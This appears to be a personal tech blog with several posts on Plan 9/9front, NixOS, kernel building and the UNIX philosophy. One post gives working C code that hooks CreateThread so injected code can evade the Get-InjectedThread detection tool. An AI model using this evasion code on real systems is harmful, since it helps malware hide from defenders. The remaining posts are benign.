Posixcafe Who's asking

Misconceptions about the UNIX Philosophy (2024/01/05)

I recently had a discussion with a friend of mine about some talking points that Jonathan Blow made regarding the "UNIX Philosophy" during his interview on Oxide's On The Metal podcast. I'll place an excerpt of the provided transcript here. (slightly edited since there were some errors in the transcript compared to what I heard Jonathan say)

Jonathan
I'm going to throw out another stone that will get people mad at me,
but so in terms of all this complexity that needs to be collapsed,
I think everything has its time. The thing–

Bryan
God, what's next? Where are you going after that?

Jonathan
Well, the Unix philosophy for example it has been inherited by
Windows to some degree even though it's a different operating system,
right? The Unix philosophy of you have all these small programs that you
put together in two like ways, I think is wrong. It's wrong for today and
it was also picked up by plan nine as well and so-

Bryan
It's micro services, micro services are an expression of Unix philosophy,
so the Unix philosophy, I've got a complicated relationship with Unix philosophy. Jess,
I imagine you do too, where it's like, I love it, I love a pipeline, I love it when I want to
do something that is ad hoc, that is not designed to be permanent because it allows me– and you
were getting inside this earlier about Rust for video games and why maybe it's not a fit in terms
of that ability to prototype quickly, Unix philosophy great for ad hoc prototyping.

There is this idea that to be UNIX means you have multiple tiny programs talking to each other over pipes, and some even take it further to implicate that this communication must be plain text. This classification is a deep misunderstanding of the ideas put forward by UNIX, and yet is a position I see many of my peers share. I see this in how when the UNIX philosophy is brought up in context of modern systems, people point to microservices and say "look at that, microservices are UNIX and microservices suck!".

How did this happen?

I feel like this is the case of people confusing the implementation for the design. Missing the forrest for the trees. I believe this happened because of people quoting and repeating things as mantras without context. The one I hear a lot is "Write programs that do one thing and do it well", which is attributed to Peter H. Salus in "A Quarter-Centurary of Unix". I also see quotes quite often from Doug McIlroy written in a Bell System Technical Journal, in particular from a bulleted list that Doug gives under a section titled Style:

A number of maxims have gained currency among the builders and users of the UNIX system to explain and promote
its charachteristic style:

(i) Make each program do one thing well. To do a new job,
build afresh rather than complicate old programs by adding new features.

(ii) Expect the output of every program to become the input to another,
as yet unknown, program. Don't clutter output with extraneous information.
Avoid stringently columnar or binary input formats. Don't insist on interactive input.

(iii) Design and build software, even operating systems, to be tried early, ideally within weeks.
Don't hesitate to throw away the clumsy parts and rebuild them.

(iv) Use tools in preference to unskilled help to lighten a programming task, even if you have to detour
to build the tools and expect to throw some of them out after you've finished using them.

These first two set of quotes seem to be so important that if you go to the Wikiepdia page for "UNIX philosophy" these are the first two quotes given in the "Origin" section. At a surface glance these are not exactly incorrect, I am not calling either author here wrong, you can observe that UNIX as it was implemented follows these ideas. The error here is when people extrapolate these implementation details out as the philosophy itself, when instead these are byproducts of applying the philosophy to specifically Operating Systems. The first two style rules given by Doug implicate specifically programs, a unit of organization that really only an operating system (whose primary job is managing them) would care about. Rule three here starts to get a bit more abstract, specifically because it implicates software and not programs, and is something I too find to be generally good advice outside of operating systems. Continuing to rule 4, we again see Doug refer to tools not processes and as such is something that I also agree with is generally adaptable to software at large.

Yet why aren't the last two style rules repeated more when discussing the "UNIX Philosophy"? Why do people seem to stop at things that tie the philosophy so closely to the notion of Operating Systems? Thinking that microservices are UNIX because it's a bunch of small programs talking to each other doesn't make sense because microservices is an architechture for distributed systems and the notion of these small programs talking to each other is a rule for operating systems. The friction that people face are from shoving a square peg in a round hole.

Actual UNIX Philosophy

Let us dig a bit more to see if we can find something that is a bit more abstract. A good start is in the preface to "The UNIX Programming Environment" by Brian Kernighan and Rob Pike. Of which the following is an excerpt:

Even though the UNIX system introduces a number of innovative programs and techniques, no
single program or idea makes it work well. Instead, what makes it effective is an approach to
programming, a philosophy of using the computer. Although the philosophy can't be written down
in a single sentence, at its heart is the idea that the power of a system comes more from
the relationships among programs than from the programs themselves. Many UNIX programs do quite
trivial tasks in isolation, but, when combined with other programs become general and useful tools.

Our goal in this book is to communicate the UNIX programming philosophy. Because the philosophy is
based on the relationships between programs, we must devote most of the space to discussions about
individual tools, but throughout run the themes of combining the programs and using programs to build
programs. To use the UNIX system and its components well, you must understand not only how to use programs,
but also how they fit into the environment.

So what happens when we abstract out those pesky operating system specific terms like "program" and "process", what we find here is that the UNIX philosophy is about composability. I'd argue the size and purpose of a program matters less so then its ability to be used with others. What feels nice about using an operating system like UNIX is that you can put code together in ways not intended, the pieces fit together like LEGO bricks.

Let us revisit the topic of microservices. The issue I often see (and have experienced) is that information flows between them in a complicated manner. Data flows through UNIX pipes linearly, from one to the next and the entire chain is present in the command, in a distributed system with a microservice design data flow often time looks more like a complicated graph with multiple edges between nodes. We can see clearly that in accordance to Rob and Brian's definition of UNIX design, microservices fail because they compose poorly. Every new edge to a node on the graph brings with it complicated dependency and overhead.

Composability doesn't have to be between programs, if for example you are building a game or end user program, composability may mean that individual libraries or components of the overall program fit together nicely. A single program can be UNIX-like, if the various individual pieces of its internals fit together well.

End

I want to cap this off by using a excerpt from Ken Thompson and Dennis Ritchie's paper "The UNIX Time-Sharing System", specifically a section titled "Perspective".

Three considerations which influenced the design of
UNIX are visible in retrospect.

First, since we are programmers, we naturally designed
the system to make it easy to write, test, and run programs.
The most important expression of our desire for program-
ming convenience was that the system was arranged for
interactive use, even though the original version only sup-
ported one user. We believe that a properly designed inter-
active system is much more productive and satisfying to use
than a “batch” system. Moreover such a system is rather
easily adaptable to noninteractive use, while the converse is
not true.

Second there have always been fairly severe size con-
straints on the system and its software. Given the partiality
antagonistic desires for reasonable efficiency and expres-
sive power, the size constraint has encouraged not only
economy but a certain elegance of design. This may be a
thinly disguised version of the “salvation through suffer-
ing” philosophy, but in our case it worked.

Third, nearly from the start, the system was able to, and
did, maintain itself. This fact is more important than it
might seem. If designers of a system are forced to use that
system, they quickly become aware of its functional and
superficial deficiencies and are strongly motivated to cor-
rect them before it is too late. Since all source programs
were always available and easily modified on-line, we were
willing to revise and rewrite the system and its software
when new ideas were invented, discovered, or suggested by
others.

Using 9front as a home router (2024/01/04)

When people discuss Plan 9 it is usually mentioned that Plan 9 is a real file orientated design but I think its is sometimes hard to conceptulize the benefits of this from an outside perspective. To assist with this I wanted to discuss how I have my 9front box at home configured to act as my home router, and show how it's done.

My hardware setup is an old DELL OEM that I've jammed a 4 port ethernet pcie card in to. I use this for both the LAN and uplink since the on board ethernet port is not gigabit. Nothing fancy, just some hardware I had lying around.

Preface

Before we get in to the weeds here we're going to need to know our tools. In Plan 9 the kernel exposes a number of functionality through kernel filesystems, think stuff like Linux's /sys/. However unlike Linux Plan 9 exposes multiple roots for different subsections that the user may bind(1) in to their namespace at will. These kernel devices can be access by accessing a path that starts with '#' and is followed be a single rune identifier. For example the IP stack is accessed via '#I' and disks (/dev/sd*) are exposed via '#S'.

Much like 9p filesystems a "mount argument" may also be supplied when accessing these devices, this is usually used to acces a specific instance of a device. For example '#l0' refers to ethernet card 0, '#l1' refers to ethernet card 1 and so on. The ip device ('#I') also allows for a integer argument to specify which IP stack you would like to access, which can be used to setup multiple disjoint IP stacks.

Setup

For making this router happen we'll create a /cfg/$sysname/cpurc script, which will run at startup.


# Place IP stack 1 on /net.alt, this will be our "outside" IP stack
bind '#I1' /net.alt

# Place ethernet card 0 within that outside IP stack
# This is just organizational, not binding it to the IP stack yet
bind -a '#l0' /net.alt

# Create a ethernet bridge and add it to our "inside" IP stack
bind -a '#B' /net
# Add all of our internal ports to our "inside" IP stack
bind -a '#l2' /net
bind -a '#l3' /net
bind -a '#l4' /net
# Bind the interfaces to the bridge
echo 'bind ether port1 0 /net/ether2' >/net/bridge0/ctl
echo 'bind ether port2 0 /net/ether3' >/net/bridge0/ctl
echo 'bind ether port3 0 /net/ether4' >/net/bridge0/ctl

x=/net.alt
o=/net
# Create a virtual IP interface for both the outside IP stack
# We open the clone file, and the kernel will then give us the
# id of the new created interface.
<$x/ipifc/clone {
	# Read the new interface number
	xi=$x/ipifc/`{read}

	# Write in to the ctl file of the newly created interface to configure it
	>$xi/ctl {
		# This is a packet interface
		echo bind pkt

		# Our ip is 192.168.69.3/24 and we only allow remote connections from 192.168.69.2
		echo add 192.168.69.3 255.255.255.255 192.168.69.2

		# Route packets to others
		echo iprouting 1

		# Now create a new interface on the inside IP stack
		<$o/ipifc/clone {
			oi=$o/ipifc/`{read}
			>$oi/ctl {
				# Hook up this device to the outside IP stack device
				echo bind netdev $xi/data

				# Our ip is 192.168.69.2/24 and we only allow remote connections from 192.168.69.3
				echo add 192.168.69.2 255.255.255.0 192.168.69.3
				echo iprouting 1
			}
		}
	}
}

# Configure our route table for both the inside and outside IP stacks
# Arguments are: target mask nexthop interface(addressed by IP)
echo add 192.168.168.0 255.255.255.0 192.168.69.2 192.168.69.3 > $x/iproute
echo add 0.0.0.0 /96 192.168.69.3 192.168.69.2 > $o/iproute

# Do DHCP on the external interface. -x tells us which
# IP stack to use. -t tells us that we are doing NAT
# and to configure the route table as such. NAT is implemented
# as just a route table flag.
ip/ipconfig -x /net.alt -t ether /net.alt/ether0

# Configure a static IP on our internal interface, which will
# act as a gateway for our internal network.
ip/ipconfig ether /net/ether2 192.168.168.209 255.255.255.0

# Start dhcpd on our internal network, our DHCP range is 192.168.168.50-192.168.168.150
/bin/ip/dhcpd 192.168.168.50 100

It is worth noting that ip/ipconfig is mostly a convenience and has no magic under the hood, it itself is just talking to files in /net. This allows us to pass different /net's via -x as we like.

That's all folks. I've been using this for about a year now and haven't had any problems with it.

Further Reading

You can read more about the specific kernel devices within section 3 of the 9front manual. Some of the ones we used today: ether bridge ip.

9front also has a network database (NDB) that is used to infer systems and their ip addresses (among other things) but was omitted to keep a focus here if you want to read more about it, look at ndb(6) and the wiki

Running 9front on an emulated SGI Indy via MAME (2024/01/01)

I recently found that MAME supports running the SGI Indy while looking for ways to test some modifications I was making to the mips code in 9front. After a fair bit of elbow grease cinap and I (but mostly cinap) were able to get the old 9front indy kernel booting and running within mame. I thought I might as well document how we set things up here. As a word of warning this will require some decent 9front infrastructure setup already and some familiarity with things like ndb, additionally this system is barely usable from a modern standard so its usefulness is limited.

Baseline MAME Indy

The mainline MAME only gives the Indy 16MB of ram, which is a little tight. Thanks to some clever folks on the irixnet forums I found a patch for bumping this limit to the theoretical maximum (256MB), you can grab a prepatched repo here or if you are using a system with nix flakes available you can use nix run github:majiru/9front-in-a-box#mame.

Next you'll need to grab the required firmware files, of which I used this guide to get going, some links may be dead but some google searching of the required file names should get you some archive.org files.

Next you'll need to configure networking, MAME is a bit unique here and expects a tap named tap-mess-$UID-0, additionally after running once you'll need to modify the $MAMEROOT/cfg/indy_4610.cfg to make the edlc device line like so:

<device tag=":edlc" interface="0" mac="08:00:69:12:34:56" />

Then you'll also likely need to modify the network from the in-emulation menu in MAME, which can be found by booting up the emulator, hitting ScrlLk followed by Tab, then clicking network settings and arrowing over to TAP/TUN network. This should only need to be done once as it will change the interface= line for the edlc device, unfortunately this specific index seems to be OS specific (was 0 for me on linux, was 2 for cinap on Windows) so its a bit difficult to modify without the in-emulation menu. At this point you should have a working Indy with networking, I suggest perhaps booting in to IRIX (as documented in the neocities guide) and double checking if you get stuck further on.

(editor's note: a real tap-mess indeed)

9front bits

Now for the fun bits, lets setup our 9front grid for bootp'ing this device. Let's first build the userspace and kernel:

cd /sys/src/

objtype=mips mk install

cd /sys/src/9/sgi

mk install

Next we need to configure the network booting, first add a /lib/ndb/local line to the tune of:

ip=192.168.168.214 ether=080069123456 sys=indy dom=indy.genso fs=myfs auth=myauth bootf=/mips/9indy

Then assuming you have your ip/tftpd running and MAME setup correctly you can boot up the Indy, click the button for maintenance mode, enter the PROM shell, then type BOOTP(); which should grab your kernel and boot right up.

Profit?

NixOS + 9Front (2023/07/21)

I, along with seemingly others, have recently discovered the NixOS linux distribution and have been having a lot of fun with it. A lot of discussion I see on NixOS tries to answer more pragmatic questions about its use. Topics such as it's feasibility as a daily driver and the learning curve of the nix language itself. While these topics are definitely worth talking about, I feel like they don't address what I consider to be the reasons for why I've been enjoying my time with it.

Its all one hackable monorepo

NixOS is entirely contained in the one NixOS/nixpkgs github repo. This design choice has made the world of difference in both how I think about using my linux system and how I am able to become an active participant.

The git repo part has some real nice aspects to it, some quick ones include:

To add a bit of narrative to that, using NixOS has been the first time where I felt like knew where to look for figuring out how the sasuage was made. I can learn and study the system, both for figuring out perhaps why something acts the way that it does or just to read to see how things click together. The fork-ability adds a lot to this as well, you are not "sitting on top of" the bespoke system setup. If you want something done differently on your system you have all the tools and access to do it in the same structured way as the OS maintainers themselves use. Having come over from arch, where each pacman -Syu was a hail mary of broken mesa or weird xwayland bugs, this has felt quite refreshing.

I find these benefits to be common for any sort of OS project that prefers to keep everything in one monorepo. With 9Front being perhaps the example I am most fond off, and an honorable mention to the BSDs in this regard. I could award full points if parts of ports didn't feel like it was about to atrophy.

Talk's cheap

It sure is. To "walk the walk" on my feelings about this, and for some of my own fun I began to slowly port over utilities that I, along with others in the 9front space, have built for use on linux. The goal being to see how nicely I could integrate my NixOS install in to my existing 9Front system.

I started first with drawterm, the "9front rdp" so to say. Nixpkgs had it already but there were a couple issues, the audio didn't work and there was no package for building the wayland graphical backend variant. Read some docs, learned some nix, and got that taken care of. Once it had been merged I had a desire to use it within my existing setup but didn't quite want to switch over to the unstable channel. Instead I just cherry-pick'd the commit over my own copy of the nixos-23.05 release branch. With flakes this was as easy as just changing the nixpkgs input to point to my own github repo. (Its worth noting that there is a process for backporting to the release branch officially).

With that done I moved on to adding my own new package, tlsclient. Tlsclient has become a bit of a swiss army knife for 9front related authentication tools on linux and as such includes a PAM module for authenticating against a 9front authentication server. Now this is something that I never really had packaged in the past, having some script to automatically modify and otherwise mess with peoples pam.d/ never felt right to me. However with the entirety of the pam config being generated as part of nixpkgs, it was quite easy to just add in the NixOS module configuration options and the corresponding PAM configuration generation based on those. The result is quite nice to use I think, here is the related excerpt from my configuration.nix:


security.pam.dp9ik = {
    enable = true;
    authserver = "flan";
};

I continued then with writing and integrating a new utility from tlsclient, a "mount helper", that wraps the linux kernel's native 9p filesystem in a dp9ik authenticated tls tunnel. After packaging this up I was able to add the following to my configuration.nix as well:


system.fsPackages = [ pkgs._9ptls ];
fileSystems."/n/flan" = {
    device = "flan";
    fsType = "9ptls";
    options = [
      "auth=flan"
      "port=9090"
      "user=moody"
      "uid=moody"
      "nofail"
    ];
};

And just like that I had my NixOS box mounting and authenticating like a 9front machine, all without too much fuss. The only logical next step was to make it look like a 9front machines as well, to which I think I did a pretty convincing job:

Wrap up

I had some good fun, was able to port over my existing linux tools without much fuss, and even got them upstreamed for once. I will likely continue to use NixOS in to the near future as my linux of choice.

If you want to look at my nix stuff you can find my personal nixpkgs development branch here, and my configurations and overlays here.

Evading Get-InjectedThread using API hooking (2021/01/27)

Get-InjectedThread is a power shell utility for allowing the user to look through running processes and find threads which seem to be the spawn of code that has been injected in to memory one way or another. How it accomplishes this is by checking running threads to see if their start address is on a page marked as MEM_IMAGE. It does the querying using the VirtualQuery function in kernel32.dll, which itself is a small wrapper around the NtQueryVirtualMemory system call.

For evading this, we simply need to ensure that the start address that gets passed to CreateThread points to a valid MEM_IMAGE mapped area of virtual memory. Now this is easy to do for smaller programs in which you can hand write a shim and use that in place of CreateThread, but this gets a bit harder when the goal is a more general purpose way of side loading.

However there is a fairly simple way around this problem by making use of API hooking and direct systemcalls. As long as the injector and the injected code continue to reside within the same process it is possible for the injector to hook API calls within the process and through that patch CreateThread() to point to a shim function within the injector's virtual memory when the call is made by the injected code. This gives the injected code free reign to call CreateThread while still skirting detection from Get-InjectedThread. The following example code illustrates one way to achieve this:


struct {
	HANDLE *mutex;
	LPTHREAD_START_ROUTINE lpStartAddress;
	LPVOID lpParamater;
	BOOL launched;
} BouncerInfo;

void
SetupPivot(void)
{
	BouncerInfo.mutex = CreateMutexA(NULL, FALSE, NULL);
	BouncerInfo.launched = TRUE;
}


void __stdcall
ThreadPivot(void *param)
{
	WaitForSingleObject(BouncerInfo.mutex, INFINITE);
	LPTHREAD_START_ROUTINE f = BouncerInfo.lpStartAddress;
	LPVOID p = BouncerInfo.lpParamater;
	BouncerInfo.launched = TRUE;
	ReleaseMutex(BouncerInfo.mutex);
	printf("[*] Pivoting to passed function\n");
	f(p);
}

//Function that can be injected over CreateThread from kernel32.dll
HANDLE __stdcall
HookedCreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParamater, DWORD dwCreationFlags, LPDWORD lpThreadId)
{
	HANDLE ThreadHandle = NULL;
	NTSTATUS res;
	WaitForSingleObject(BouncerInfo.mutex, INFINITE);
	//It's possible that we get two CreateThread calls before a pivot
	//occurs, this is a bad way of dealing with it but it shouldn't happen often
	while(BouncerInfo.launched == FALSE){
		printf("[!] Double entry detected, spin locking...\n");
		ReleaseMutex(BouncerInfo.mutex);
		WaitForSingleObject(BouncerInfo.mutex, INFINITE);
	}
	BouncerInfo.lpStartAddress = lpStartAddress;
	BouncerInfo.lpParamater = lpParamater;
	BouncerInfo.launched = FALSE;
	//Direct system call shim function
	res = NtCreateThreadEx10(&ThreadHandle, GENERIC_ALL, NULL, GetCurrentProcess(), ThreadPivot, lpParamater, FALSE, 0, 0, 0, NULL);
	ReleaseMutex(BouncerInfo.mutex);
	if(res != STATUS_SUCCESS){
		printf("[!] HookedCreateThread error: %lx\n", res);
		return NULL;
	}
	return ThreadHandle;
}
The code is a bit complex due to the asynchronous nature of CreateThread. We first setup a global struct that will store the last set of arguments that were given to our hook as well as a mutex to lock our variables between our threads. We also use a boolean flag variable within the struct to make sure that a pivot for a given address happens before another call to CreateThread is made and it overwrites the start address. This is needed as control can return to the caller of CreateThread before the new thread has a chance to run, which can result in multiple calls happening before a pivot can be made on the original address.

Doing this will cause new threads to have their start address set to PivotThread which is located in the MEM_IMAGE flagged area of memory from our injector.

For information on hooking and direct system calls I have code snippets for each available.

9chroot (2020/06/16)

I've recently set up and automated a process for building nightly ISO files for 9front, mostly for use in using them or installing virtual machines that I would like to be up to date but don't expect to live long. One thing I wanted with this machine was to use a dedicated disk for building and keep a clean system to build the ISO files from. However it would also be nice to have the build machine using my existing file server such that it could do internal builds as well. To solve this I decided to see if I it was possible to have specific programs on a cpu server run under a different root filesystem.

First up was getting the machine alive and on 9front. Putting a disk in the machine and running through the typical install procedure left me with a terminal using a local hjfs disk as it's root. To add it in to my existing network I configured plan9.ini properly and initialized nvram to make this new machine a standard cpu node for my network.

However using this for building the ISO files left me with three problems:

To solve this I figured I could make use of the existing clean hjfs filesystem on the disk for building. The first step of this is starting hjfs on system boot.

#start hjfs on boot and post to /srv/hjfs
echo 'hjfs -f /dev/sdE2/fs -n hjfs -m 2011' > /cfg/$sysname/cpustart

#bind it in by default when I rcpu in
echo 'bind -c #s/hjfs /n/hjfs' > /cfg/$sysname/namespace

Next we construct a namespace file for the build script to use.

# Replace the use of '#s/boot' to instead use the hjfs instance
sed 's/boot/hjfs/ /lib/namespace > /lib/namespace.build

# Test that everything works by changing in to the new namespace
auth/newns -n /lib/namespace.build

This leaves us with what looks like a typical 'chroot' enviornment that can be invoked for specific programs. With this I can set something up in the cron file of my auth server like this:

40 5 * * * una auth/newns -n /lib/namespace.build /usr/glenda/bin/rc/nightly > /sys/log/build

This will run the nightly script every morning under the new namespace while saving the output to my normal cwfs filesystem. It's worth noting that if you plan to have this namespace be usable for the none user then /srv/hjfs must be read-writable from the none user, adding a chmod o+rw /srv/hjfs after hjfs is started to /cfg/$sysname/cpustart will fix this issue.

9front Bare Bones Kernel (2020/05/05)

I have recently been interested in reading and understanding the processes of kernel development. In that effort I have been spending some time reading the OSDev wiki as well as this fantastic set of blogs for writing a kernel in rust. However I quickly ran in to two problems:

As such I thought it might be worth while to take a peek on getting a barebones kernel setup using the common tools that are available on the OS that I do most of my development in, 9front. As such I set out to first learn how 9front manages its kernel, and then see if I could strip out just the minimum to get myself a little "hello world".

Knowing where to look

Let's start by looking at how 9front organizes it's kernel code. All of the kernels are located in /sys/src/9/$objtype/ with port referring to portable code between them. For our purposes we're only going to look at the amd64 kernel. There are three files that are good to look at first

Also worth noting is a couple additional directories:

Start putting stuff together

Copying over the l.s file we see tons of stuff that we wont need, so lets trim it down a bit. Reading it quickly we find that we call our main funciton in _start64v, so let's delete everything after that. We also can see that l.s requires a mem.h so let's grab that as well. Then let's write our own very tiny kern.c with a void main(void) entry point. For now simply enterying a infinite loop will suffice.

#include <u.h>

u32int MemMin; //Filled by l.s, thus the symbol must be somewhere

void main(void) { for(;;); }

Now let's get each of these compiled/assembled.

; 6c kern.c && 6a l.s

Now if we check the 9pc64 mkfile for how to link them we see something a bit out of the norm. First we see a KTZERO variable declared and then it being passed to the linker through the -T flag.

Looking at the man page for the linker, we see that the -T flag tells the linker where to start placing the .TEXT section for the binary. To understand why this is needed, let's remind ourselves of what goes on in the average boot(in relation to our kernel).

When we first get to our kernel we have not set up virtual memory, so our first sets of jumps and addressing must use the physical addresses. Looking at mem.h we can see that KZERO (kernel zero) is set to 0xffffffff80000000, so this must be where 9boot puts the start of our kernel binary. However, the start of the binary is not the start of executable code, that would be the .TEXT section. So we must have a common definition of where our executable code starts between our linker and our l.s code. This allows l.s to tell 9boot where exactly in physical memory to jump to.

To acomplish this we pick a common starting point, define it in our source code, and make sure to pass it to the linker so things lign up. So now that we know what is going on, let's link our kernel:

6l -o kern -T0xffffffff80110000 -l l.6 kern.6

It's worth noting that l.6 must come first or else our dance to get the .TEXT section aligned will be pointless, as kern.6 will be placed first in to the section.

Now let's verify that we indeed set things up right by using file(1). The output should look like:

kern: amd64 plan 9 boot image

Booting our new kernel

We have one more step before we can actually get our fresh kernel booted in something like QEMU. We need to create a cdrom iso image that contains both our kernel as well as 9boot. For this we will take a look at the existing script for iso generation on 9front: /sys/lib/dist/mkfile.

Lets start by creating a new plan9.ini for 9boot to point to our new kernel:

echo 'bootfile=/amd64/9pc64' > plan9.ini

We'll also want a local copy of /sys/lib/sysconfig/proto/9bootproto so that we can add our kernel path to it.

Now that we have those, let's create our iso using disk/mk9660 like so:

; @{rfork n
# Setup our root
bind /root /n/src9
bind plan9.ini /n/src9/cfg/plan9.ini
bind kern /n/src9/amd64/9pc64
disk/mk9660 -c9j -B 386/9bootiso \
-p 9bootproto \
-s /n/src9 -v 'Plan 9 BareBones' kern.iso
}

With that, you should have a bootable iso image fit for use in something like QEMU.

Source

The source code is available on my github. It adds a small print message in kern.c as well as a mkfile from what is shown here.

Using fossil and venti as auxiliary storage on plan9. (2019/12/30)

For those that are not familiar, venti and fossil are disk file systems for the plan9 operating system. Venti acts as append only storage of data blocks, and fossil is a local copy of these blocks represented as a traditional file system. The most notable advantages to these systems is that venti has aggressive dedup and is append only. Data is addressed by its sha1 hash, and can never be deleted once stored. Fossil can sync data back to venti, generating a 'vac', this hash is a key to fossils 'window' in to the venti data, allowing it to construct local filesystem trees out of it. This means that essentially, venti archives all of the actual storage of the files, and vacs act as keys in to snapshots of that data that fossil can work with. Perhaps the most interesting part about fossil is that it is 'lazy loaded', meaning that data is pulled from venti only when absolutely necessary, making for the ability to create very small fossils for viewing previous vacs. Recently, I had thoughts this system would sound great for an auxiliary addition to my current plan9 setup. My thoughts were to store source code of mine and others(really just my $home/src) in to it, to both test and see if the benefits were worth. This post will kind of walk through my processes in creating configuration. This was done on 9ants5, but could be done an a normal 9front release if desired.

First though some history and thoughts on fossil and venti themselves. When used for a rootfs, it allows for multiple fossil installs based around one central venti. Since the information is dedup'd one fossil and 50 fossils use the same space on the venti server. This works well with the traditional idea of 9 being a 'grid' system, making the addition of new machines pratically free. The other great part is the snapshot capabilities, the snapshots themselves are ephimeral, and you can quite easily create a new fossil pointing to an existing snapshot. This would allow you, for example, to spin up a new machine/VM with a snapshot of last months code to test for comparisons. Because the whole system is snapshotted, you can tests with the context of the entire system. This is in contract to the idea of using modern VCS to manage individual projects, where it can be hard to truly rewind infrastructure to a specific point in time. Fossil even allows for the ability of trees, if you want to test a slight deviation you can use a base vac and create sperate branches of modifications, each getting their own new vac. With some simple tooling, this could be used to some very efficent version control systems(admitably, this currently does not exist to my knowledge). As for history, fossil was the original plan9 file system when it was first open sourced by Bell Labs. However, a nasty bug plauged it until 2012, leading it to give a bad impersonation, and eventual migration away from it. Since then a lot of experimentation and support has been done by the creator of 9ants, mycroftiv. One notable project is his 'spawngrid' system, which leverages ramfossils for on the demand containers.

For getting fossil+venti up and running pop open your disk(or file) in disk/edisk and create one large "plan9" partition. Then we need to divy this partition up in to our two venti partitions. disk/prep -a arenas -a isect /dev/sdE0/plan9 should do just fine. Next we need to write a config file for venti. The following should do:

; cat >/tmp/venti.conf <<.
index main
arenas /dev/sdE0/areans
isect /dev/sdE0/isect
mem 32m
bcmem 48m
icmem 64m
httpaddr tcp!*!8000
addr tcp!*!17034
.

This points venti to our partitions and tells it to start listening and accept connections from any origin. Now to actually format the partitions and write our config to venti.

; venti/fmtarenas arenas /dev/sdE0/areans
; venti/fmtisect isect /dev/sdE0/isect
; venti/fmtindex /tmp/venti.conf
; venti/conf -w /dev/sdE0/areans /tmp/venti.conf

We should be all ready to go, let's start it up with
; venti/venti -c /tmp/venti.conf.
You can verify by looking at http://$host:8000/storage. Which should give you a summary of the available storage.

Now on to the more fun part, let's make a fossil for this venti. Since we don't really plan to have much data on this, we can use a file through ramfs to get started.


; ramfs
; dd -if /dev/zero -of /tmp/fossil -count 200000 #create a 200M file
; cat >/tmp/initfossil.conf <<.
fsys main config /tmp/fossil
fsys main open -AWPV
fsys main
create /active/adm adm sys d775
create /active/adm/users adm sys 664
users -w
uname upas :upas
uname adm +glenda
uname upas +glenda
srv -p fscons.newfs
srv -A fossil.newfs
.
; venti=$ventihost
; fossil/flfmt /tmp/fossil
; fossil/conf -w /tmp/fossil /tmp/initfossil.conf
; fossil/fossil -f /tmp/fossil

Now that it is up and running, lets connect to the fs console and do some additional configuring and take a snap shot.

; con /srv/fsons #ctl-\ + q quits
fsys main
uname $user :$user #add our user to fossil
create /active/src $user $user d775 #add a directory for our user to write to
sync # sync all of our changes
snap # write to venti, when it is done you should get a vac
# quit out of con
# clean up
; kill fossil | rc
; unmount /tmp

Now you should be able to take advantage of the 9ants ramfossil script to access the data stored, just keep track of the vac, and remember that if you want changes to persist, you need to snap the filesystem and note the new vac. If you don't want to keep setting the $venti environment variable, add it as a value for your system under /lib/ndb/local just like $auth. You could add a script to your $home/lib/profile to test for /srv/ramfossil and start ramfossil if needed and then bind it over $home/src(what I did). You may also want to change the ramdisk fossil size by editing the ramdisk script itself, I found 1G to be fairly reasonable. If the fossil ever fills up, simply snap it to venti and start a new one from the newly generated vac. The lazy loading aspect should keep you covered for actually/writing 1G in one session.

For the sake of completeness, I will also walk through the processes of creating a persistent fossil filesystem. Start by using disk/edisk like before then


; ramfs
; cat >/tmp/fossil.conf <<.
fsys main config /dev/sdG0/fossil
fsys main open -c 3000
fsys main snaptime -a 0500
srv -p fscons
srv -A fossil
.
; disk/prep -a fossil /dev/sdG0/plan9
; fossil/flfmt /dev/sdG0/fossil
; fossil/conf -w /dev/sdG0/fossil /tmp/fossil.conf
; venti=$myventi fossil/fossil -f /dev/sdG0/fossil
; unmount /tmp

This will set the fossil to snapshot at 5am to the venti, 9ants' fshalt scripts should handle snycing it when the system goes down(note it will not snapshot). Huge thanks to mycroftiv and his 9ants scripts for helping me figure my way through the install, setup processes, and keeping the fossil and venti system alive and usable for a standard user.